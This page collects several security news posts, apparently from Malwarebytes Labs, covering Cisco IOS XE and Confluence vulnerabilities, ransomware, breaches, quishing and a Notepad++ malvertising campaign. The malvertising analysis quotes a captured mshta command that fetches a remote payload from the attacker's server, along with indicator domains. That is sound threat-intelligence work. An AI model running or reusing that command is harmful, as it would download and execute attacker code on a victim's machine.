IT NEWS

An authentication bypass affecting Cisco IOS X was disclosed on October 16, 2023. Researchers have found since then that the vulnerability is widely being exploited in the wild to help install implants on affected switches and routers.

Cisco IOS XE is a universally deployed Internetworking Operating System (IOS) that enables model-driven programmability, application hosting, and configuration management, helping to automate day-to-day tasks.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The vulnerability at hand is listed as:

CVE-2023-20198 (CVSS score 10 out of 10: Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.

What Cisco failed to mention was that thousands of internet-facing IOS XE systems have been implanted. The researchers scanned internet-facing Cisco IOS XE web interfaces and found thousands of implanted hosts.

Cisco has also yet to publish a list of affected devices, but if you are using Cisco switches, routers or Wireless LAN Controllers, you should assume they are vulnerable.

The implants that were found enable the attacker to communicate with the compromised device and use that ability to monitor web traffic, perform lateral movement in the network, or use them for a machine-in-the-middle attack.

The Cisco Talos team discovered there were malicious activities correlated with this vulnerability as early as September 18, 2023.

Mitigation

This vulnerability affects Cisco IOS XE Software if the web UI feature is enabled. The web UI feature is enabled through the ip http server or ip http secure-server commands.

To determine whether the HTTP Server feature is enabled for a system, log in to the system and use the show running-config | include ip http server|secure|active command in the CLI to check for the presence of the ip http server command or the ip http secure-server command in the global configuration. If either command is present, the HTTP Server feature is enabled for the system.

Cisco strongly recommends that customers disable the HTTP Server feature on all internet-facing systems. To disable the HTTP Server feature, use the no ip http server or no ip http secure-server command in global configuration mode. If both the HTTP server and HTTPS server are in use, both commands are required to disable the HTTP Server feature.

While a patch is not yet available, it is advisable to protect your organization by disabling the web interface and removing all management interfaces from the internet immediately. Which is always good advice.

The Cybersecurity & Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities Catalog, based on the evidence of active exploitation. This means all Federal Civilian Executive Branch Agencies (FCEB) have to verify that instances of Cisco IOS XE Web UI are in compliance with BOD 23-02 (Mitigating the Risk from Internet-Exposed Management Interfaces) and apply mitigations per Cisco’s instructions. For affected products (Cisco IOS XE Web UI exposed to the internet or to untrusted networks), organizations must follow Cisco’s instructions to determine if a system may have been compromised and immediately report positive findings to CISA before October 20,2023.

Organizations should look for unexplained or newly created users on devices as evidence of potentially malicious activity relating to this threat. One method to identify if the implant is present is to run the following command against the device, where the “{DEVICEIP}” portion is a placeholder for the IP address of the device to check: 

curl -k -X POST “https://{DEVICEIP}/webui/logoutconfirm.html?logon_hash=1”

Note: The above check should use the HTTP scheme if the device is only configured for an insecure web interface. If the request returns a hexadecimal string, the implant is present.

We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Cybersecurity could be as easy as 1-2-3.

The problem, though, is that people have to want it.

In new research conducted by Malwarebytes, internet users across the United States and Canada admitted to dismal cybersecurity practices, failing to adopt some of the most basic defenses for staying safe online. And while some of the fault lies with the public, some also lies with the cybersecurity industry, which, according to the same research, has released products that people do not understand, do not trust, and, most concerningly, do not use for their intended benefits.

For our latest report, “Everyone’s afraid of the internet and no one’s sure what to do about it,” we surveyed 1,000 people, aged 13 to 77, about their cybersecurity and online privacy beliefs and behaviors. When asked specifically about the tools and methods that people use to protect themselves online, we found, disappointingly, that:

• Just 35 percent of people use antivirus software.
• Just 24 percent of people use multi-factor authentication.
• Just 15 percent of people use a password manager.
• Just 35 percent of people have unique passwords for most or all of their accounts.

There’s no denying the ugly truth here: These numbers are too low.

Optimistic interpretations do exist—perhaps some members of the public unknowingly have antivirus protections on their devices or they perhaps use device-provided password managers without knowing the name of the technology behind it—but other statistics point to a lack of trust and a high rate of apathy towards cybersecurity defenses overall.

For everyone interested in meaningful, simple cybersecurity, here are three things you can do right now.

1. Create and store unique passwords for each account with the help of a password manager

Strong passwords are a two-part problem: They must be unique for every online account, and they must be remembered.

Creating strong, unique passwords is simple enough, as any person can throw a cat at a keyboard and likely fulfill the password requirements for most online accounts. Uppercase and lowercase letters? Special characters? Numbers? No addresses, pet names, or usernames? These specifications are no match for “vn;aeo&d8ey38dD” (No cats were harmed in the creation of this password).

But remembering that password—and remembering every password like it—is physically impossible, as the number of online accounts and associated passwords that the average person can recall from memory is just a handful. 

In fact, there is plenty of research that shows that people have trouble remembering unique passwords for just 13 separate accounts, and that the people have far more trouble remembering 4 – 6 passwords compared to 1 – 3.

But the modern internet doesn’t care about mental limitations. Instead, it demands an increasing number of accounts and passwords to manage for each person. According to research from the password manager LastPass, the average small business user has 85 passwords, and according to older research in 2015 from another password manager, Dashlane, an average user then had at least 90 accounts.

The results of this constant tension are reflected in Malwarebytes’ latest report:

• 24 percent use the same password, if possible, across all or most accounts
• 41 percent have a few passwords they use across accounts

The most obvious solution to this first part of the password problem, then, is a password manager. Password managers can create and store strong, unique passwords for all your accounts, and they can interact directly with web browsers so that you don’t need to individually open the password manager app every time you log into a service.

Unfortunately, Malwarebytes’ research shows that password manager use is exceedingly low:

• 15 percent of all respondents use a password manager
• 9 percent of Gen Z respondents use a password manager
• 18 percent of non-Gen Z respondents use a password manager

Get a password manager and start using it specifically to create and store unique passwords across all your accounts. You physically cannot practice strong password security without one (unless you go the paper-and-pencil route, which is an entirely different conversation).

But once you have a password manager, don’t stop there…

2. Use multi-factor authentication (MFA)

There are two statistics that matter for multi-factor authentication (MFA).

The first statistic was released in 2019, when Microsoft’s Group Program Manager for Identity Security and Protection Alex Weinert said: “Based on our studies, your account is more than 99.9 percent less likely to be compromised if you use MFA.”

The second statistic was released this month, when Malwarebytes found that only 24 percent of people use MFA. That number drops to 16 percent for Gen Z.

MFA tackles the problem of password abuse in a very different way than password managers and password creation.

MFA does not care if your password sucks. MFA will not make you use any special characters or numbers or uppercase or lowercase letters. MFA doesn’t require you to “remember” anything.

Instead, MFA stands between your account and the abuse of your password by requiring you to enter another form of authentication—other than a password—to log in. That means that even if a cybercriminal has your login information for your bank, that alone would not be enough to gain access. Instead, your bank would ask for a second form of authentication, which is typically a six-digit passcode that is sent to your device through a text message or email, or it is generated by your device with a separate app.  Once you enter that passcode, only then are you allowed entry.

MFA is available on nearly every single critical type of online account today, and it should be used for the services that hold your most sensitive information, including your email, social media, and online banking.

3. Use antivirus

Ask a cybersecurity writer (me) how it feels to learn that just 35 percent of people use antivirus and you’ll hear an answer: “Not great.”

Ask the same cybersecurity writer how it feels to learn that just 17 percent of Gen Z use antivirus and you’ll hear a different answer: “Ah, sh*t.”

The public are not entirely to blame. As Malwarebytes discovered in its latest report, it is not that the public do not care about cybersecurity and online threats—it is that they do not know entirely how to stay safe, or how cybersecurity tools protect them.

As Malwarebytes found:

• 41 percent agreed or strongly agreed with the statement: “I don’t fully understand how different cybersecurity products can protect me.”
• 37 percent agreed or strongly agreed with the statement: “Cybersecurity products only really help with things like viruses and malware.”
• 25 percent agreed or strongly agreed with the statement “There’s no point in using cybersecurity products since there are too many online threats.”

The cybersecurity industry should learn from this. We are failing to speak plainly about security tools, failing to explain how malware can be detected through its delivery in malicious websites that are blocked by online tools like BrowserGuard, and failing to show how digital consequences, like account compromise, identity theft, and credit card fraud, are strictly connected to well-known threats like credential stuffing and data theft. 

Particularly upsetting is that sometimes, even the users of online security and privacy tools have the wrong impression about those tools.

As Malwarebytes found, 22 percent of people use a VPN specifically to “help stop viruses/malware from getting on my device”—a function that VPNs do not provide. (In rare circumstances, some malware avoids detonation based solely on IP addresses, but that is an exception for the average user.)

Antivirus works. We know you may consider Malwarebytes a biased speaker, but the fact still stands. Every year, Malwarebytes detects and removes millions of viruses, Trojans, adware infections, monitoring tools, and more from user devices around the world. Importantly, behind nearly every detection is an attempt to harm you, the user. 

Don’t fall for the easy path of apathy. Take three simple steps to stay safe.

Read the report

As the White House prepares to host its annual International Counter Ransomware Initiative (CRI) summit, Bloomberg reports that the US is pushing other countries to stop paying ransoms to cybercriminals.

The CRI wants to enhance international cooperation to combat the growth of ransomware, and its 47 members will convene in Washington for its annual summit on October 31, 2023.

“The work of the CRI supports the implementation of the endorsed UN framework for responsible state behavior in cyberspace, specifically the voluntary norm that States should cooperate to exchange information, assist each other, prosecute terrorist and criminal use of ICTs and implement other cooperative measures to address such threats.”

White House Deputy National Security Adviser Anne Neuberger said ransomware payment bans have been a topic of discussion among members of the CRI, and she noted that several other countries have also raised the issue, but no decisions have been made.

The reasoning is very understandable. Ransomware has grown to be a formidable industry over the years and if it was possible to stop the cashflow in that direction, it would soon collapse. Not only would the seasoned criminals turn to other sources of income, the entry-level jobs would disappear and the funds for research into new tactics would dry up.

If an agreement is reached, this would only bind government organizations, but even that could potentially have a large impact. Other experts believe that the energy spent on achieving this would be more effectively spent on helping less well-equipped governments improve their cyber-defenses.

If we could eliminate the low-effort attacks on long-known vulnerabilities where patches are available but unapplied, this could have at least the same kind of impact.

And to be fair, several US states have banned local government entities from paying ransoms connected to attacks. So far, this really hasn’t stopped them from being targeted. In 2021, The FBI even advised against making ransom payments illegal because it would only open up another avenue of extortion.

One might think that now that most organizations have their backup strategies sorted out, it shouldn’t be too hard to convince victims not to pay the ransom. Unfortunately many ransomware gangs have adapted the double extortion strategy where stolen data extracted from the victim’s systems during the attack is used as extra leverage. And when sensitive data is stolen, having a backup does not take away the threat.

Also, it’s not fair to think that all government organizations in the member states have their security and backup strategy at the required level to safely survive a ransomware attack. But we feel it is true that they should be setting an example by investing in their security posture and by refusing to pay the criminals.

Neuberger said that she would like participating governments to publicly commit to not make ransom payments, but if members can’t agree to the statement in advance of the meeting, then it will be included as a discussion point.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
• Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Last week on Malwarebytes Labs:

• Explained: Quishing
• Update now! Atlassian Confluence vulnerability is being actively exploited
• Giant health insurer struck by ransomware didn’t have antivirus protection
• Ransomware review: October 2023
• Stalkerware activity drops as glaring spying problem is revealed
• CISA catalog passes 1,000 known-to-be-exploited vulnerabilities. Celebration time, or is it?
• 23andMe user data stolen, offered for sale
• AI sneak attacks, location spying, and definitely not malware, or, what one teenager fears online: Lock and Code S04E21
• Upgrading your Android device? Read this first

Stay safe!

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Cloud infrastructure provider Shadow has warned of the data theft of over 500,000 customers. The customers were informed by a breach notification which was posted online.

Cloud is known in the gaming world and, among other things, allows gamers to play resource heavy games on lower-end devices,

The stolen data includes full customer names, email addresses, dates of birth, billing addresses, and credit card expiration dates. According to Shadow, no passwords or sensitive banking data have been compromised.

Shadow says the incident happened at the end of September, and was the result of a social engineering attack on a Shadow employee. The attack began on the Discord platform after the employee downloaded malware he believed to be a game on the Steam platform.

Shadow says that despite swift countermeasures, the attackers were able to use one or more of the cookies they had stolen in order to connect to the management interface of one of Shadow’s SaaS providers. From there the attackers were able to steal the data from Shadow by using their Application Programming Interface (API) access.

According to BleepingComputer, a cybercriminal claiming responsibility for the attack is selling the stolen database on a well-known hacking forum.

image courtesy of BleepingComputer

In the message, the cybercriminal says IP connection logs were also stolen in the breach in addition to the other data mentioned by Shadow.

It is unclear, although likely, whether Shadow has reached out to everyone involved. Shadow recommends that users set up multi-factor authentication (MFA) on their accounts, and watch out for any emails that appear to come from Shadow, as they could be phishing attempts.

The company is also telling users to contact customer service with any questions or concerns.

Data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

• Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
• Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
• Enable multi-factor authentication (MFA). This is good advice from Shadow, and something we always advise. If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of multi-factor authentication can be phished just as easily as a password. MFA that relies on a FIDO2 device can’t be phished.
• Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
• Take your time. As Shadow warns, phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

In recent weeks, we have noted an increase in malvertising campaigns via Google searches. Several of the threat actors we are tracking have improved their techniques to evade detection throughout the delivery chain.

We believe this evolution will have a real world impact among corporate users getting compromised via malicious ads eventually leading to the deployment of malware and ransomware.

In this blog post, we look at a malvertising campaign that seems to have flown under the radar entirely for at least several months. It is unique in its way to fingerprint users and distribute time sensitive payloads.

Malicious ads for Notepad++

The threat actor is running a campaign targeting Notepad++, a popular text editor for Windows as well as similar software programs such as PDF converters. The image below is a collage of malicious ads we observed recently, all run by the same threat actor but via different ad accounts, likely compromised.

A first level of filtering happens when the user clicks on one of these ads. This is likely an IP check that discards VPNs and other non genuine IP addresses and instead shows a decoy site:

However, intended targets will see a replica of the real Notepad++ website hosted at notepadxtreme[.]com:

Fingerprinting for VM detection

A second level of filtering happens when the user clicks on the download link where JavaScript code performs a system fingerprint. We had previously observed some malvertising campaigns check for the presence of emulators or virtual machines and this is what happens here also, although the code being used is different and more complex.

If any of the checks don’t match, the user is being redirected to the legitimate Notepad++ website. Each potential victim is assigned a unique ID that will allow them to download the payload.

Custom, time-sensitive download

Another thing that sets apart this campaign from others is the way the payload is being downloaded. Each user is given a unique ID with the following format:

CukS1=[10 character string][13 digits]

This is likely for tracking purposes but also to make each download unique and time sensitive.

Unlike other malvertising campaigns the payload is a .hta script. It follows the same naming convention seen above with the download URL:

Notepad_Ver_[10 character string][13 digits].hta

Attempting to download the file again from the same URL results in an error:

.HTA Payload

The .hta file we captured during our investigation was not fully weaponized. However, we were able to find another one that was uploaded to VirusTotal in early July. It uses the same naming convention and we can see the lure was “PDF Converter” instead of Notepad++.

The script is well obfuscated and shows 0 detection on VirusTotal. However, upon dynamic analysis, there is a connection to a remote domain (mybigeye[.]icu) on a custom port:

C:WindowsSysWOW64mshta.exe "C:WindowsSystem32mshta.exe" 
https://mybigeye .icu:52054/LXGZlAJgmvCaQfer/rWABCTDEqFVGdHIQ.html?client_id=jurmvozdcf1687983013426#he7HAp1X4cgqv5SJykr3lRtaxijL0WPB6sdGnZC9IouwDKf8OEMQTFNbmYzU2V+/=

We also notice it uses the same client_id stored in the filename when making that remote connection.

While we don’t know what happens next, we believe this is part of malicious infrastructure used by threat actors to gain access to victims’ machines using tools such as Cobalt Strike.

Innovation makes malvertising a greater threat

We have observed an increase in the volume of malvertising campaigns but also in their sophistication over the past several months. Threat actors are successfully applying evasion techniques that bypass ad verification checks and allow them to target certain types of victims.

With a reliable malware delivery chain in hand, malicious actors can focus on improving their decoy pages and craft custom malware payloads. This is another space where we see some innovation and where security vendors are currently running behind.

Threat intelligence is a critical part of a defensive strategy to better understand the threat landscape in order to protect users. For example, tracking malicious ads allows us to quickly identify the infrastructure used by threat actors and immediately block it. Following the malware delivery chain shows us any new techniques that may bypass current security products and helps us to adjust our detections accordingly.

Indicators of Compromise

Ad domains:

switcodes[.]com
karelisweb[.]com
jquerywins[.]com
mojenyc[.]com

Fake Notepad++ site:

notepadxtreme[.]com

Script C2:

mybigeye[.]icu

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Quishing is phishing using QR (Quick Response) codes. QR codes are basically two-dimensional barcodes that hold encoded data, and they can be used to work as a link. Point your phone’s camera at a QR code and it will ask you if you want to visit the link.

The use of QR codes in malicious campaigns is not new, and because they can provide contactless access to a product or service they grew in popularity during the Covid-19 pandemic.

In August, 2023 we wrote about an email campaign that used QR codes to phish for Microsoft credentials. The links in the QR codes redirected from legitimate domains associated with Bing, Salesforce, and Cloudflare to send the targets to phishing sites that were after Microsoft credentials. Since the subject of the emails were often fake Microsoft security notifications, the Bing URLs would not have looked out of place to any victims who gave them a cursory examination.

Lately, there has been an increase in quishing emails, which either send victims to malware-infested sites or ones looking for credentials. 

The usual methods are used to make the emails look convincing: The email will pretend to come from a bank or another organization you trust, or might look like internal mails from the organization you work for, perhaps pretending to come from HR or the IT department. The QR codes in these mails are either embedded or sent as an attachment.

Most of the email contains little to no text, which reduces the chances of the scammer making a mistake and gives spam filters less to read. The message is displayed in an image, which also helps the email get through spam filters.

Example

I personally received a quishing mail pretending to be from the KVK (the Dutch Chamber of Commerce), telling me I had to request a digital key within the next 3 days or my company would be registered as inactive.

As you can see, a lot of the normal signs by which we can recognize a phishing mail are there:

• Urgency
• A link leading to a site to fill out personal information
• Sloppy lay-out of the mail

I was also able to recognize it as false because the sender address didn’t belong to the organization it claimed to be from.

The QR code contained a link to the lihi1.com URL shortener which pointed me to a clone of the KVK site.

It asked for my name, birth date, address, mobile phone number, my KVK registration number and my bank account number. A succesfull phisher can probably sell that data for a few bucks on the dark web.

To stay safe from quishing, you can follow the same advice we provide for phishing, because that’s what it is. It’s just that the method to obfuscate the phishing site is a bit more sophisticated, which also makes the use of it more suspicious.

One extra measure you can take is to install a QR code scanner that doesn’t take you to the destination in the URL, but displays it for you, so you can decide whether you want to proceed.

Stay alert for hallmarks of phishing campaigns, such as a sense of urgency, appeals to your emotions. Be extremely wary if a QR code takes you to a site that asks for personal information, login credentials or payment.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Microsoft Threat Intelligence has revealed that it has been tracking the active exploitation of a vulnerability in Atlassian Confluence software since September 14, 2023. At the time the attacks were first observed the vulnerability was a zero-day, meaning that no update was available, so defenders had “zero days” to patch the flaw.

The vulnerability has since been issued an ID, CVE-2023-22515, and rated with the highest possible severity, a CVSS score of ten. Atlassian’s October 4 advisory warns that “Publicly accessible Confluence Data Center and Server versions … are at critical risk and require immediate attention.”

If you are running Confluence Data Center or Confluence Server inside your organisation and it’s exposed to the public internet you should take steps to prevent exploitation, upgrade your software and look for evidence of compromise (take a look at the Atlassian advisory for detailed information about threat hunting).

Versions of Atlassian Confluence before 8.0.0 are not vulnerable. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue. The fixed versions of Confluence are 8.3.3 or later, 8.4.3 or later, and 8.5.2 or later.

CVE-2023-22515 is a broken access control vulnerability that allows an attacker with network access to the server to create unauthorized Confluence administrator accounts and access Confluence instances. If your Confluence software is on the public internet than the attacker has network access over the internet.

On October 10, 2023, Atlassian updated its advisory to say that it has “evidence to suggest that a known nation-state actor is actively exploiting CVE-2023-22515”.

On the same day, Microsoft Threat Intelligence took to X (formerly Twitter), to say that a nation-state actor, codenamed Storm-0062, which it believes to be a nation-state actor working on behalf of China, had been exploiting CVE-2023-22515 since mid-September.

Microsoft has observed nation-state threat actor Storm-0062 exploiting CVE-2023-22515 in the wild since September 14, 2023. CVE-2023-22515 was disclosed on October 4, 2023. Storm-0062 is tracked by others as DarkShadow or Oro0lxy.

— Microsoft Threat Intelligence (@MsftSecIntel) October 10, 2023

Although the vulnerability started as a zero-day in the hands of nation state hackers, it will likely take on a second life in the hands of less sophisticated criminals.

We are now in the “patch gap,” the period of time between a patch being available and it being applied. This creates a window of opportunity for mass exploitation, which could last months or even years. The arrival of a patch allows organisations to fix their systems, it also informs a wider group of criminals about the existence of the vulnerability. Criminals and researchers can then reverse engineer the patch to identify the problem, and then create their own code to exploit it, or wait for others to do it for them.

Proof-of-concept exploits for CVE-2023-22515 have already appeared on GitHub so there is not time to lose. How long the patch gap lasts is entirely down to how quickly organisations update their Confluence software. History suggests organisations may struggle to find the speed required. For example, one of 2022’s most routinely exploited vulnerabilities was CVE-2021-26084, a remote code execution flaw in Confluence that was discovered in the middle of the previous year.

We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

The Philippine Health Insurance Corporation (PhilHealth), has confirmed that it was unprotected by antivirus software when it was attacked by the Medusa ransomware group in September.

Antivirus software—or more correctly, its modern descendents endpoint security and Endpoint Detection and Response (EDR)—are essential tools in the battle against cybercrime. EDR can detect an intruder’s suspicious activity in advance of them running ransomware, as well as being able to identify the ransomware itself.

Because of this, ransomware groups, who can spend days or even weeks setting up an attack inside a compromised network, will typically try to disable antivirus software.

GMA News reports that PhilHealth confirmed that lack of antivirus on its news programme, 24 Oras:

In Mark Salazar’s report on “24 Oras” on Monday, PhilHealth confirmed that its antivirus software had expired on April 15, but that it had not been able to renew its subscription immediately due to complicated government procurement processes.

PhilHealth is the government owned and controlled corporation that provides universal health coverage in the Philippines. It was attacked on September 22, 2023.

According to a recent post on its Facebook account, all of the corporation’s public-facing applications have been back online since October 6, 2023, including “the website, Member Portal, eClaims for electronic submission of hospital claims, and EPRS for employer remittances.”

The organisation deserves praise for recovering its systems swiftly and for refusing to pay the ransom demand, which is reported to be around $300,000. In response, the Medusa ransomware group has made data stolen in the attack available for download on its dark web leak site, saying the “Company came to the tor chat but didn’t answer for the payment yet.”

Filipino news site Rappler reports that almost 750 gigabytes of information was stolen from PhilHealth, and the number of PhilHealth members affected is in the “millions”.

Their data is now available for download on the dark web. PhilHealth warns that members are likely to be “victimized by opportunists” who can use the information to create targeted and believable social engineering attacks.

In response, PhilHealth “strongly recommends changing passwords of online accounts, enabling multi-factor authentication, monitoring of suspicious activities in their online accounts, not opening and clicking suspicious emails and links, and not answering suspicious calls and text messages”

The attack is a great example of how ransomware attacks aren’t really about computers, they are about the effects they have on people. Despite expending a lot of hot air on the subject, ransomware groups have shown time and again that they are absolutely not above targeting the healthcare sector. As the attack on Ireland’s Health Service Executive in 2021 showed, attacks on healthcare can create uncertainty, delays, enormous stress and legal jeopardy for staff, and the very real risk of pain, physical harm and even death for patients.

In the twelve months between October 2022 and September 2023, there were 213 known attacks against the healthcare sector, making it the ninth most attacked sector globally. More than half of those attacks occurred in the USA, where healthcare was the third most attacked sector, suggesting it may be targeted deliberately in the USA rather than opportunistically.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

On September 18, 2023, the Cybersecurity & Infrastructure Security Agency (CISA) announced that its Known Exploited Vulnerabilities (KEV) catalog has reached the milestone of covering more than 1,000 vulnerabilities since its launch in November 2021.

This may seem like a lot, but with over 25,000 new vulnerabilities released in 2022 alone, it helps organizations to focus on the vulnerabilities that matter the most.

Many organizations are running a plethora of software and internet-facing devices, and vulnerabilities that can be used to exploit them are found every day. Everybody knows they need to patch, but deciding what to patch when, and then finding the time and resources to do it, are significant challenges.

CISA says that one of the reasons to launch the KEV catalog was to help organizations prioritize which vulnerabilities to address first.

“As a starting point, we know that the majority of vulnerabilities are never exploited by malicious actors.”

CISA issued Binding Operational Directive 22-01 in November 2021 which established the catalog and bound everyone operating federal information systems to abide by it.

Federal Civilian Executive Branch (FCEB) agencies are handed specific—and very tight—deadlines for when vulnerabilities must be dealt with. Specifically, the Directive requires those agencies to remediate internet-facing listed vulnerabilities within 15 days and all others within 25 days. 

For everyone else it’s an opportunity to filter out the vulnerabilities by something even more relevant than CVSS scores where the exploitability of a vulnerability is only a sub score.

Because it’s based on what criminals are actually exploiting, your organization might still want to feed the catalog into its patch management strategy.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. To be considered for the catalog, the first criterium a vulnerability has to meet is to have a unique CVE ID so organizations can know precisely which vulnerability it concerns. This is not as straightforward as it may seem. CISA works with vendors, open-source projects, and the CVE program to ensure that every vulnerability that is exploited in the wild is properly identified with a CVE ID.

The second criterium is proof of the active exploitation. This evidence needs to be from a credible source – a known industry partner, a trusted security researcher, or a government partner. Even then, sorting through vast amounts of data to distinguish genuine, malicious exploitation can prove to be a daunting task.

“We can find ourselves chasing whispers of exploitation in the wild that circulate online. Adding to the challenge is that some adversaries are elusive and sophisticated, leaving barely a trace of their digital footprints.”

And last but not least, an effective mitigation needs to be available. After all, it’s no use listing a vulnerability with a due date when there is no cure at hand.

It’s hard to find metrics to show what the effect of the KEV catalog is on malware infections and ransomware attacks, but what is clear is that the mean-time-to-remediate listed vulnerabilities was an average of nine days faster than for non-listed – and 36 days faster for internet-facing vulnerabilities.

CISA says it’s exploring options to add more informative fields, such as noting whether a specific vulnerability is being used by ransomware actors, which may be of particular use to sectors such as healthcare and education. It may help you further prioritize based on your threat model.

We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.